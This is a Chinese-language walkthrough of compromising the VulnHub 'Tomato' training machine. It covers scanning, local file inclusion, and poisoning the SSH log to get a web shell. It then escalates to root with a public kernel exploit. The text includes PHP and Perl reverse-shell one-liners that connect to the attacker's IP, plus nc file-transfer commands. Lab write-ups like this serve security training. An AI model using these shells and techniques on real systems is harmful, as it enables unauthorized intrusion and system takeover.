vulnhub靶机渗透 Tomato

Tomato靶机入侵

1、环境搭建

下载地址： https://download.vulnhub.com/tomato/Tomato.ova

​ 下载后用 VMware 或者 VirtualBox 打开，并配置好网卡，靶机与攻击机应置于同一网络下，靶机默认是桥接模式，能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

• 主机发现

  使用nmap进行主机探测（-sP参数也可)：nmap -sn 192.168.110.1/24
  

  192.168.110.137,为靶机ip，也可以使用Kali中的arp-scan工具扫描：arp-scan 192.168.110.1/24

• 端口扫描

  使用nmap扫描端口，并做服务识别和深度扫描（加-A参数）：nmap -p- -A 192.168.110.137

  

  靶机开启了21端口FTP服务、80端口Apache服务、2211端口ssh服务和8888端口nginx服务。

3、漏洞探测

• 目录扫描

  8888端口访问需要口令，80端口网站首页是一张西红柿图片，没有什么信息。使用dirsearch对网站进行扫描。
  
  找到一个/antibot_image/ 目录，进而找到/antibots/目录
  

  发现一个phpinfo页面，screenshot-3.jpg展示了网站开启了AntiBotPlugin插件
  
  其他文件没发现扫描有价值的东西

  重点关注phpinfo页面，发现可能存在文件包含
  
  远程文件包含是关闭了
  
  成功包含passwd文件
  

• 包含日志文件，getshell

  这里没发现有什么地方可以上传，只能看看有没有什么日志可以包含。

  常见的Apache 日志路径

  /var/log/apache/access.log
  /var/log/apache2/access.log
  /var/www/logs/access.log
  /var/www/html/logs/access.log
  /var/log/access.log
  

  均失败了。因为靶机开启了ssh服务和ftp服务可以尝试这两个服务的日志。最后成功包含ssh服务的日志。/var/log/auth.log
  

  尝试登录，被记入日志。用户名写成一句话，蚁剑连接成功
  
  

4、权限提升

翻了一下靶机的文件没有发现是什么有用的线索，应该是要内核提权了

使用php反弹一个shell到本地

php -r '$sock=fsockopen("192.168.110.129",10086);exec("/bin/sh -i <&3 >&3 2>&3");'

需要url编码后才能执行，且蚁剑上不能执行，以前类似的环境试过，就python可以。但这里并不能执行python

后面测试可以使用perl反弹

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.233.131:9999");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

bash -i 获得一个交互式shell

查看系统内核

uname -a
cat /proc/version

查找可用exp

 searchsploit 4.4.0-21

使用了第一个，失败了。上传一个提权辅助脚本linux-exploit-suggester到靶机，能够检测Linux内核/基于Linux的机器存在哪些本地权限提升漏洞

利用nc传文件（也可以用蚁剑，我这里学习一下用nc）

靶机：进入/tmp目录，开启监听
nc -nvlp 9999 > [接收报存文件名]

攻击机nc 192.168.110.137 9999 < [要传文件名] -w 1

靶机收到后，加执行权限：chmod 777 tq.sh 后再执行 ./tq.sh

在kali上检索此漏洞EXPsearchsploit -p 45010。第一个看了一下有点复杂这里用第二个。

本地编译后上传到靶机。最好在目标上面编译（有的exp会有影响），但目标上面没有gcc

蚁剑上传

加权执行成功，成功提权